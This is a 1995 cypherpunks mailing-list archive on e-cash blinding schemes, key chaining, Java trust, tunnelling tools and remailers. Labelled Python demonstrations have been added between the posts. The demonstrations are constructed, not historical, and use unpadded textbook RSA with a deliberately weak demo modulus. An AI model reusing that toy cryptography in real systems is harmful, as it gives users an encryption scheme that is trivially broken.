> they need to know.  As to their being "blown away," I tend to doubt it. 
> The idea is useful but not revolutionary.
> 
> >We'll know for sure when they release the details of the spec. And, if 
> >they go to the logical conclusion of all this secrecy and they *don't* 
> >release the spec, it won't be worth a bucket of warm snake oil.
> 
> If they have applied for a patent and if the effectiveness of the scheme
> does not rely upon secrecy of the scheme, then of course there is no
> reason for secrecy.  They sent me an evaluation copy of the program and
> have been fairly open in discussing it.  (No one has suggested an NDA or
> even that there were any secrets involved.)  While for security I would
> rather have Lotus Notes or Secure Exchange, for ease of administration
> this program has advantages.
> 
> The product is interesting and less bogus than your meters might lead you
> to believe.  Few of us would like to have our products evaluated strictly
> on the basis of press releases and reports.
> 
> I believe that the scheme infringes patents of which I am aware.
> 
> 
> 
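A sketch of the key-chaining property WHMurray describes above, as an added example that is not Elementrix's algorithm or code. The HMAC-SHA256 update rule, the toy XOR stream cipher, the sample messages and all names are assumptions standing in for details the post does not give.

```python
import hashlib
import hmac


def next_key(key: bytes, plaintext: bytes) -> bytes:
    """Assumed update rule: key n = HMAC-SHA256(key n-1, content of message n-1)."""
    return hmac.new(key, plaintext, hashlib.sha256).digest()


def xor_stream(key: bytes, data: bytes) -> bytes:
    """Toy stream cipher (SHA-256 in counter mode); encrypts and decrypts."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


class Endpoint:
    """One party's key state for one correspondent."""

    def __init__(self, initial_key: bytes):
        self.key = initial_key

    def send(self, plaintext: bytes) -> bytes:
        ciphertext = xor_stream(self.key, plaintext)
        self.key = next_key(self.key, plaintext)  # both ends advance in step
        return ciphertext

    def receive(self, ciphertext: bytes) -> bytes:
        plaintext = xor_stream(self.key, ciphertext)
        self.key = next_key(self.key, plaintext)
        return plaintext


def replay(initial_key: bytes, recorded: list) -> list:
    """What a listener who knows the initial key gets from a traffic record."""
    listener = Endpoint(initial_key)
    return [listener.receive(c) for c in recorded]


# Constructed sample data: a population-wide starting key and three messages.
SHARED = hashlib.sha256(b"constructed population-wide initial key").digest()
MESSAGES = [b"meet at noon", b"bring the report", b"room 4 instead"]


def demo() -> dict:
    alice_to_bob, bob_from_alice = Endpoint(SHARED), Endpoint(SHARED)
    alice_to_carol = Endpoint(SHARED)
    wire = [alice_to_bob.send(m) for m in MESSAGES]
    delivered = [bob_from_alice.receive(c) for c in wire]
    alice_to_carol.send(b"hello carol")
    return {
        # Synchronous operation: Bob follows as long as nothing is lost.
        "delivered": delivered == MESSAGES,
        # Same starting key, different traffic: the pairwise keys differ.
        "pair_keys_diverged": alice_to_bob.key != alice_to_carol.key,
        # Initial key plus a complete record is enough to read everything.
        "full_record_reads_all": replay(SHARED, wire) == MESSAGES,
        # Initial key plus a record missing the first message is not; the
        # same thing happens to a receiver who loses a message (re-synch).
        "late_listener_reads_last": replay(SHARED, wire[1:])[-1] == MESSAGES[-1],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```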







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 23 Oct 95 13:24:32 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <Pine.SOL.3.91.951022233806.16282B-100000@chivalry>
Message-ID: <199510232023.OAA10038@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Simon Spero" <ses@tipper.oit.unc.edu> 
 allegedly wrote:
>
> I can't remember off hand, but isn't blinding transitive?


Blinding and unblinding is just multiplication and division in
modular arithmetic, right?  So it oughta be transitive, right?
I actually don't know, and I am eager to find out.


 "'Simon Spero'":
>
> If so, there's 
> an obvious way to get two way anonymity with an on-line system. If Alice 
> wants to pay Bob $10, then Bob could prepare the usual squillion copies 
> of the note, each with a serial number known only to Bob, then blind them 
> and send them to Alice. 
> 
> Alice would then reblind them and send them to Nick, the banker. Nick
> would then pick one of the notes, and ask Alice for the blinders for the
> rest. Alice would then ask Bob for his blinders for the rejected notes,
> and would forward both sets on to Nick, who would check them, and if
> they're legit, sign the remaining copy, and return it to Alice.  
> Alice could then remove her blinding factor, and send the result on to
> Bob. Bob then removes his blinding factor, and can now spend the coin. 


You mean he can now deposit the note with the bank for credit?  
Although he won't actually deposit it until later, some random 
amount of time after this transaction is finished.
  He *could* give the note to Charles, who would deposit it, but
Charles would not be able to protect his own identity when
accepting it.  Bob might as well just turn it in to the bank.


 "'Simon Spero'":
>
> Since Alice doesn't know the serial number, she can't reveal it to Nick 
> so that he can find out who deposits the coin. Also, since Nick doesn't 
> know the serial number, he can't collaborate with Bob to find out who 
> Alice is. 
> 
> Does this work, or am I missing something?


It sounds good to me.  Bob will check the note for the bank's sig
after he has unblinded it.  Thus he knows that Alice didn't cheat
him.


Can a more astute mathematician than myself evaluate this scheme for
us?


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIv5vfWZSllhfG25AQHlsAP/SL7IxwVQ/J5k3OdbZm/B6GCl/ZpvKgV6
iyaHJKp4p3zGM6rlq9x0mj/hWedxeCgSA9x/ptcMoVY8A5l/wpGPSZhVRrb4/NRV
LDjwGb9g9g3/u5bHsK2dGo1FqnvCa0fBur2TzC07CvAFHlP1hzFPtEsemd1OB7fj
mWToHOYPDKY=
=fFvb
-----END PGP SIGNATURE-----
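The exchange Simon Spero proposes and Bryce asks about, as an added example that is not part of either post: with RSA blinding, two blinders applied in turn behave like the single blinder r_a * r_b mod N, so the layers can be stripped one party at a time. The demo key, the `amount|serial` note format, the `cheat_index` and `bank_choice` parameters and all function names are assumptions.

```python
import hashlib
import secrets
from math import gcd

# Constructed demo key built from two Mersenne primes: fine for showing the
# arithmetic, not a safe RSA key. Textbook RSA without padding, demo only.
P, Q = 2**521 - 1, 2**607 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent of Nick, the banker


def digest(note: bytes) -> int:
    """Integer that gets signed: SHA-256 of the note, always below N here."""
    return int.from_bytes(hashlib.sha256(note).digest(), "big")


def new_blinder() -> int:
    """Random blinding factor that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(value: int, r: int) -> int:
    return value * pow(r, E, N) % N


def unblind(value: int, r: int) -> int:
    return value * pow(r, -1, N) % N


def verify(note: bytes, signature: int) -> bool:
    return pow(signature, E, N) == digest(note)


def blinding_composes(note: bytes) -> bool:
    """Two blinders applied in turn equal one blinder r_a * r_b mod N."""
    r_a, r_b = new_blinder(), new_blinder()
    return blind(blind(digest(note), r_b), r_a) == blind(digest(note), r_a * r_b % N)


def run_payment(amount="$10", copies=8, cheat_index=None, bank_choice=None):
    """Bob -> Alice -> Nick -> Alice -> Bob. Raises ValueError if the audit fails."""
    # Bob: candidate notes with serials only he knows, blinded once.
    notes = [f"{amount}|{secrets.token_hex(16)}".encode() for _ in range(copies)]
    if cheat_index is not None:  # Bob slips in a larger denomination
        notes[cheat_index] = f"$1000|{secrets.token_hex(16)}".encode()
    bob_r = [new_blinder() for _ in notes]
    from_bob = [blind(digest(n), r) for n, r in zip(notes, bob_r)]

    # Alice: blinds every candidate again before it reaches the bank.
    alice_r = [new_blinder() for _ in from_bob]
    to_bank = [blind(c, r) for c, r in zip(from_bob, alice_r)]

    # Nick: keeps one candidate and asks for both sets of blinders (and the
    # notes) for all the others, then recomputes what he was sent.
    keep = secrets.randbelow(copies) if bank_choice is None else bank_choice
    for i in range(copies):
        if i == keep:
            continue
        reopened = blind(blind(digest(notes[i]), bob_r[i]), alice_r[i])
        if reopened != to_bank[i] or not notes[i].startswith(amount.encode() + b"|"):
            raise ValueError(f"audit failed on candidate {i}")
    signed = pow(to_bank[keep], D, N)  # signed without Nick seeing the note

    # Alice strips her factor, then Bob strips his.
    signature = unblind(unblind(signed, alice_r[keep]), bob_r[keep])
    return notes[keep], signature, to_bank[keep]


if __name__ == "__main__":
    note, sig, seen_by_bank = run_payment()
    print("signature valid for Bob's note:", verify(note, sig))
    print("bank saw the note digest:", seen_by_bank == digest(note))
```

With `copies` candidates, one altered candidate escapes the audit only when the bank happens to keep that one, a chance of 1 in `copies`.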




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 23 Oct 95 11:48:17 PDT
To: cypherpunks@toad.com
Subject: FV -- What we have learned
Message-ID: <okWy_syMc50eNcPEQV@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Please excuse the cross-posting, I'll keep it short.

With my colleagues at First Virtual, I have recently completed what we
intend to be the definitive statement about what FV has learned from a
full year of processing payments over the Internet.  This is not
intended as a puff piece, but a serious academic-style overview.  We're
hoping it will prove to be a valuable resource for anyone trying to
process payments on the net, even those who disagree with some aspects
of FV's approach.  The paper will be presented next week at the
"Frontiers in Electronic Commerce" conference in Austin.  

In Postscript, it's a 14 page paper with a nearly 30 page appendix, so
it doesn't *have* to be a long paper to read unless you want it to be. 
:-)   Plain text and postscript versions are available on the net by
anonymous ftp:
	ftp://ftp.fv.com/pub/nsb/fv-austin.{txt,ps}
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 12:07:01 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: CSP
In-Reply-To: <199510230156.UAA09239@osh1.datasync.com>
Message-ID: <199510231909.PAA17630@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Frosty writes:
>      The Lawsuit, filed Thursday in state Supreme Court, claims AT&T
> residential calls are billed in full minutes, meaning a call lasting one
> minute and one second would be billed as a two-minute call.

This is not at all relevant to the list.

Incidentally, I hope this lawsuit gets laughed out of court. If you didn't
know that calls get billed by the minute, then you must never have glanced
at a phone bill.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 12:13:18 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <9510231413.AA26514@all.net>
Message-ID: <199510231915.PAA17647@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> If Netscape wants to claim their product doesn't degrade security, they
> should provide a safe postscript interpreter or not provide hooks to
> unsafe ones.

By the same logic, it might be claimed: "If Netscape wants to claim their
product doesn't degrade security, they should provide a safe Internet or not
provide access to unsafe Internet sites."

I disagree. And yes, I'm arguing in my spare time.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Mon, 23 Oct 95 15:26:47 PDT
To: cypherpunks@toad.com
Subject: Internet Security Review
Message-ID: <C120ZVZQM0OYB*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Internet Security Review
Date: Mon, 23 Oct 1995 15:20:23 PST
A1-type: DOCUMENT
Importance: normal


>Just got a copy via mail today. Boy, Dorothy Denning seriously dings
>Tim May in this issue. Interesting reading to know what the other side
>is up to nonetheless. She uses some reasoning that will be compelling to
>many.

>Doug Hughes				Engineering Network Services
>doug@eng.auburn.edu			Auburn University

Doug,

Could you possibly expand on this a little bit? I don't usually see this
publication.

Thanks!

Connie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@hidden-foes.gateway.com>
Date: Mon, 23 Oct 95 12:38:23 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT:  Digest Version Changes Hosts
Message-ID: <Pine.LNX.3.91.951023153300.5298A-100000@hidden-foes.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


The digest version [cypherpunks-d] of the cypherpunks mailing list has 
been moved to a faster host.

Previously it was under the care of majordomo@gateway.com, but it has 
been moved to the care and feeding of majordomo@hidden-foes.gateway.com.

The new machine has a bit more disk, a bit more processor, and is on the 
fast end of a T1 [the other was at my home on the good 'ole shared 28.8k 
SLIP].

ANYWAY---->  If you were subscribed to the digest version already, you 
are still there.  If you would LIKE to subscribe to the digest version, 
just send e-mail to 'majordomo@hidden-foes.gateway.com' with the line 
'subscribe cypherpunks-d' in the BODY.

The digest is created every 40k [or about 2-3 times/day it seems].  
Please let me know directly if there are any problems with this new system.

BTW, the first issue after moving to the new system will be Volume 2, 
Issue 1.

Thanks,
-abc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Mon, 23 Oct 95 14:37:08 PDT
To: cypherpunks@toad.com
Subject: Internet Security Review
Message-ID: <199510232136.QAA26765@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Just got a copy via mail today. Boy, Dorothy Denning seriously dings
Tim May in this issue. Interesting reading to know what the other side
is up to nonetheless. She uses some reasoning that will be compelling to
many.

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 23 Oct 95 16:51:20 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510232350.QAA17025@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Simon Spero" <ses@tipper.oit.unc.edu>  wrote:
>> If so, there's 
>> an obvious way to get two way anonymity with an on-line system. If Alice 
>> wants to pay Bob $10, then Bob could prepare the usual squillion copies 
>> of the note, each with a serial number known only to Bob, then blind them 
>> and send them to Alice. 
>> 
>> Alice would then reblind them and send them to Nick, the banker. Nick
>> would then pick one of the notes, and ask Alice for the blinders for the
>> rest. Alice would then ask Bob for his blinders for the rejected notes,
>> and would forward both sets on to Nick, who would check them, and if
>> they're legit, sign the remaining copy, and return it to Alice.  
>> Alice could then remove her blinding factor, and send the result on to
>> Bob. Bob then removes his blinding factor, and can now spend the coin. 

This is an interesting idea but it is more complicated than necessary, I
think.  The denomination can be carried in the exponent, in which case
there is no need for cut and choose and nobody can cheat the bank.  A
coin suitable for deposit is a signed number of some special form.  To
pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
gives her a blinded coin, which she reblinds and gives to the bank.  The
bank signs it (debiting Alice's account) and gives it back to her.  She
strips off her blinding and gives it to Bob.  He strips off his own
blinding and verifies that he is left with a signed number of the
appropriate form.

This system is in some ways the inverse of regular ecash.  Instead of
Alice withdrawing a coin ahead of time, and Bob checking it with the bank
right away, it is Alice who does the bank interaction at payment time,
and Bob who waits before interacting with the bank.  The computational
and communications costs do not seem much worse than ecash.

There is no way Alice can double-spend because she cannot anticipate
Bob's blinding factor and give him a previously-spent coin which will
unblind to the proper form.  There could be an issue of fraud, though,
where Bob insists that Alice's coin was no good even though it actually
was.  Since he has blinded it she will have no way of recognizing it when
he eventually deposits it.  In the current system this does not arise as
Alice can always give him another copy of the coin and prove that it is
good, and she can further determine if Bob has deposited it.  So some of
the trust in the bank necessary with regular ecash gets replaced by trust
between payee and payor in Simon Spero's system.

Still, I think this scheme has considerable merit and is worth exploring
further.  It seems to provide superior privacy protection over Chaum's
ecash.  The fraud issue can perhaps be dealt with by reputations and
credentials as we have often discussed.

Hal
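
The payee-blinded exchange described in the message above, as an added example (not code from the post or from any ecash implementation). It assumes RSA blind signatures, a toy modulus built from two Mersenne primes, one public exponent per denomination, and a "special form" of serial number plus SHA-256 digest; every function and account name is hypothetical.

```python
import hashlib
import secrets
from math import gcd

# Toy bank modulus: two Mersenne primes (constructed, trivially factorable).
P, Q = 2**521 - 1, 2**607 - 1
N, PHI = P * Q, (P - 1) * (Q - 1)

# Denomination carried in the exponent: one public exponent per value.
# Assumption: distinct small primes that are coprime to PHI.
_USABLE = [e for e in (19, 23, 29, 37, 43, 47, 53, 59) if gcd(e, PHI) == 1]
DENOM_E = dict(zip((1, 5, 10), _USABLE))  # dollars -> public exponent


def coin_form(serial: bytes) -> int:
    """Assumed 'special form': 16-byte serial followed by its SHA-256."""
    return int.from_bytes(serial + hashlib.sha256(serial).digest(), "big")


def has_coin_form(m: int) -> bool:
    if m >= 2**384:
        return False
    raw = m.to_bytes(48, "big")
    return hashlib.sha256(raw[:16]).digest() == raw[16:]


def blind(value: int, e: int):
    """Multiply by r^e mod N; return the blinded value and the factor r."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return (value * pow(r, e, N)) % N, r


def unblind(signed: int, r: int) -> int:
    """Divide out one blinding factor from a signed value."""
    return (signed * pow(r, -1, N)) % N


class Bank:
    def __init__(self):
        self.balances = {"alice": 20, "bob": 0}  # constructed sample accounts
        self.spent = set()

    def sign_blinded(self, account, denom, blinded):
        """Debit the payer and sign whatever blinded number was sent."""
        if self.balances[account] < denom:
            raise ValueError("insufficient funds")
        self.balances[account] -= denom
        d = pow(DENOM_E[denom], -1, PHI)
        return pow(blinded, d, N)

    def deposit(self, account, denom, m, sig):
        """Credit the payee once per coin of the proper form."""
        ok = pow(sig, DENOM_E[denom], N) == m and has_coin_form(m)
        if not ok or m in self.spent:
            return False
        self.spent.add(m)
        self.balances[account] += denom
        return True


def bob_request(denom):
    """Bob makes a fresh coin and blinds it before showing it to Alice."""
    m = coin_form(secrets.token_bytes(16))
    blinded, r_bob = blind(m, DENOM_E[denom])
    return m, r_bob, blinded


def alice_relay(bank, denom, from_bob):
    """Alice reblinds, has the bank sign, and strips only her own factor."""
    reblinded, r_alice = blind(from_bob, DENOM_E[denom])
    signed = bank.sign_blinded("alice", denom, reblinded)
    return unblind(signed, r_alice)


def bob_finish(m, r_bob, from_alice, denom):
    """Bob strips his factor and checks the signature on his own coin."""
    sig = unblind(from_alice, r_bob)
    if pow(sig, DENOM_E[denom], N) == m and has_coin_form(m):
        return sig
    return None


if __name__ == "__main__":
    bank = Bank()
    m, r_bob, b1 = bob_request(10)
    sig = bob_finish(m, r_bob, alice_relay(bank, 10, b1), 10)
    print("payment accepted:", sig is not None)
    print("deposit accepted:", bank.deposit("bob", 10, m, sig))
    print("balances:", bank.balances)
```

The bank only ever sees the doubly blinded number, and Alice only the singly blinded one, so neither can recognise the coin at deposit time; that is also why Alice cannot prove a rejected coin was good.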




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 23 Oct 95 01:58:45 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510230100.DAA00697@soikko.cs.hut.fi>
Message-ID: <Pine.LNX.3.91.951023161515.27409A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Tatu Ylonen wrote:

> > an ETT client and an ETT server, using Diffie-Hellman and DSA for
> 
> You are aware that RSADSI claims they have exclusive licensing rights
> for DSA?

Adding MD5 support wouldn't be a bad idea. Same for algorithms 
alternative to Blowfish (3DES etc.) and DH (e.g., with Elliptic 
functions-based key exchange), all automatically negotiated at connection 
time.

> Are you familiar with ssh [http://www.cs.hut.fi/ssh]?  It has many of
> the features that you are planning.

I think that Wei's idea is for something more general, similar to the
CryptoTCP 0.9 posted a few months ago by ModX and available from 
ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/ctcp.0.9.tar.gz
(that one used unauthenticated DH key exchange and 3DES, IMHO with a 
highly questionable PRNG for the generation of the session key).

It would be enormously more useful and popular if someone could write a
Winsock redirector loadable after WINSOCK.DLL but before any Winsock
application, hooking the API functions used to open TCP connections. That
would mean instant transport-level crypto capability for most Winsock
apps, just like NEC's SocksCap provides instant SOCKS (alas, V.4)
compliance. 

Also Perry's invitation to join the IPSEC effort should be given proper
attention (I would do it, if only my spare time were not in such short
supply). I would try to implement it on SLiRP, a free SLIP/PPP simulator
largely based on BSD TCP/IP code (but running in user mode). That would
allow one to experiment without having to hack the kernel, and would have a
practical value for converting conventional login accounts into
IPSEC-compliant SLIP/PPP accounts (instant crypto, again). Networking
technologies gain much faster popularity once a critical mass of users
actually use them. And to reach that mass, we must enlist all the 
non-techies who just run unmodified Windows applications.

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Mon, 23 Oct 95 14:21:12 PDT
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <199510232119.RAA15716@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02110101acaf51651ef9@[204.156.156.4]>,
Todd Glassey <todd@lgt.com> wrote:
[ lines marked > > are from fc@all.net (Dr. Frederick B. Cohen) ]
> Pardon the flame but I really have just about heard enough of this BS...
[...]
> >> The area where we can (must) build trust is the computing base.
> >> Traditionally, this has been the OS, but in the case of java, it is
> >> the java interpreter (such as netscape 2.0 and hotjava).  The browser
> >>  is now the TCB (trusted computer base) for all practical purposes...
> >
> >Read: The Java interpreter is supposed to be a TCB.
[...]
> >Who here truly believes that the implementations of Java meet the
> >requirements of a TCB?
[...]
> Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava.
[ ... flame deleted ... ]


No, here I think Dr. Cohen's comments are right on the mark.

The Java interpreter *is* supposed to be a trusted computing base.
Do we have any reason to believe that this trust is well-placed?

(If you don't agree, go through the Orange Book evaluation criteria,
and pay special attention to the assurance sections...)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIwG2CoZzwIn1bdtAQEpowGAgHiyk0tTQk5SO/3TR5EZRMFmUy/TjQmu
NbYIt0R/Tf0g9xWbolm5XN0alu947uJs
=UZH0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 17:25:54 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510232235.SAA26441@opine.cs.umass.edu>
Message-ID: <199510240020.RAA24876@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	With the release of digicash I hope that we can soon make this
stuff for-pay and much of the spam problem will be fixed. (Not all of
it, of course.)
	(I am rather hesitant to setup an account with Mark Twain
though.. $2,500 min balance and not FDIC insured?)


> 
> Lance Cottrell writes:
> > I think one solution to this problem is to encourage (require) the use of
> > pseudonym servers. Having a server like alpha as the entity on the from
> > line has several advantages.
> > 
> > 1) Less Spam since it takes some effort to set up the nym and it will be 
> > taken away as soon as the spam starts.
> 
> I fear this will be a short-lived gain. User-friendly scripts for 
> establishing pseudonymous accounts are pretty easy to write. They may be
> beyond the average Fast Money Maker, but I expect myself and others will be
> putting them out on the Net for general consumption. 
> 
> I can certainly imagine one of those scripts being expanded to automatically 
> create salesdroid001@nymsrus.org, ..., salesdroid999@nymsrus.org and emitting 
> the same spam once from each pseudonym to a different destination. You would
> want to apply a statistical spam filter (of the kind mentioned recently by
> Greg Broiles) to the entire output of each pseudonymizer in an attempt to
> nip such spams in the bud.
> 
> Semi-permanent account status confers privileges to the user, IMHO. I
> believe a pseudonymous account ideally should be treated the same as a 
> regular account on an ISP. For example, an admin will not unilaterally close 
> an account upon receiving a single complaint about the account user. 
> Certainly I don't know of an ISP that routinely blocks its users' accounts
> from sending mail to selected other accounts. Lest I seem too presumptuous, 
> let me say that I realize all immediately foreseeable pseudonymizers are
> free services. Clearly these service providers can set whatever policies they
> wish, and are not directly competing with the fee-charging ISPs. Perhaps 
> future fee-charging pseudonymizers will consider these criteria in offering 
> enhanced services.
> 
> -Futplex <futplex@pseudonym.com>
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 23 Oct 95 09:39:44 PDT
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510231749.A23074-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995, Rev. Mark Grant wrote:

> I suspect that I could easily hack this into Mixmaster in a day or two,

Ok, I have an initial version that works on single-packet messages (there
seems to be a lot of code duplication for multi-packet messages), and
ought to have it finished off and tested by the end of the week. I doubt
I'll be able to set up such a remailer, but I'll release a patch for 2.0.2
and hopefully Lance can incorporate it into the next release as a
compile-time option. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kawika Daguio <KDAGUIO@aba.com>
Date: Mon, 23 Oct 95 14:56:12 PDT
To: cypherpunks@toad.com
Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD -Reply
Message-ID: <s08bd782.015@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


Sir,

I am still lurking on the Information Railroad(TM)
I am still trying to preserve privacy while maintaining
accountability for all parties.  Technical solutions are
insufficient, no matter how innovative.  

My greatest problem today is the lack of sophistication of
decisionmakers.  Very few people understand the technology,
economics, and politics of electronic commerce.  Keeping governments
from making the wrong decisions is difficult.  Keeping bankers from
doing the same is even more difficult.  Most of the discussion occurs
between bank marketing and R&D types.  Compliance, operations,
security, risk management, and legal counsel units within banks are
often uninformed about the efforts of the technology delivery groups.

It is also difficult to offer financial services to the new world. 
It is not easy to "know your customer," evaluate risks, and price the
risks when you cannot verify their identity or reach them easily. 
Bankers prefer orderly environments to anarchy.  So do governments.

      ****Extremely Personal Observation*****
So do I.  I like privacy, I do not need true anonymity nor do I wish
to engage in significant interaction or be exposed to anonymous
persons.
IF SOMEONE WEARING A HOOD OR A MASK COMES TO MY DOOR
THEY WILL BE AUTOMATICALLY VIEWED AS AN IMMEDIATE THREAT.
I may classify non-anonymous persons as threats after evaluating
available information.  Banks and governments will similarly look
askance at those who wish to wear masks when engaging in commerce.

Respectfully, 
Kawika Daguio

THE ABOVE ARE MY PERSONAL OBSERVATIONS
NO ONE SHOULD ATTRIBUTE THE SENTIMENTS
EXPRESSED TO THE ASSOCIATION OR OUR MEMBERS.



>>> Timothy C. May <tcmay@got.net>  10/22/95, 11:19pm >>>

I saw this on the Cyberia list. Those of you near Washington, D.C.
may find this worth attending.

By the way, one of the speakers, Kawika Daguio, was once on this list
(and may still be, though I haven't seen posts from him in a while).

--Tim May



>Date: Sun, 22 Oct 1995 17:04:32 -0400
>Errors-To: thardy@mail.wm.edu
>Reply-To: cyberia-l@warthog.cc.wm.edu
>Originator: cyberia-l@listserv.cc.wm.edu
>Sender: cyberia-l@warthog.cc.wm.edu
>Precedence: bulk
>From: "Cleveland Thornton" <thornton@legalbits.com>
>To: Multiple recipients of list <cyberia-l@warthog.cc.wm.edu>
>Subject: (Fwd) DIGITAL CASH IN AN ELECTRONIC WORLD
>X-Listserver-Version: 6.0 -- UNIX ListServer by Anastasios Kotsikonas
>
>
>For those in the Washington, DC area, you may find the following
>meeting of interest,
>
>
>
>------- Forwarded Message Follows -------
>Date:          Sat, 21 Oct 1995 21:54:36 -0400 (EDT)
>From:          Andrew Grosso <agrosso@access.digex.net>
>To:            Cleveland Thornton <cthornto>
>Subject:       Please Post
>
>                THE FUTURE OF MONEY:
>       DIGITAL CASH IN AN ELECTRONIC WORLD
>
>        The evolution of money has now completed
>a one hundred eighty degree turn from the point
>where our economy began: from a barter marketplace;
>to paper currency; and, today, to pure information
>exchanged globally over telecommunications lines.
>Money is digital, and can be created, utilized,
>and transmitted by individuals and companies, as
>well as by governments.
>
>        On Thursday, November 2, at noon, the
>Computer Crime Subcommittee of the ABA will host
>a luncheon program which will examine the birth
>and promise of digital cash.  The speakers repre-
>sent all three of the important organizations
>participating in this venture: designers, bankers,
>and governments:
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 23 Oct 95 18:07:22 PDT
To: (Recipient list suppressed)
Subject: Mark Twain Bank (was: Anonymity: A Modest Proposal)
Message-ID: <v02120d07acb1f3d69b57@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



First of all, those who have looked over the MT Bank stuff all
know that they are clearly off to a very shaky start. I know of
three guys that could have done a _much_ more professional job,
almost a year ago. Unfortunately we were rejected by Chaum as
insufficiently respectable. So now we get a service that is
lame, confusing and expensive -- at least at the bank end.

Chaum apparently continues to suffer from the belief that he
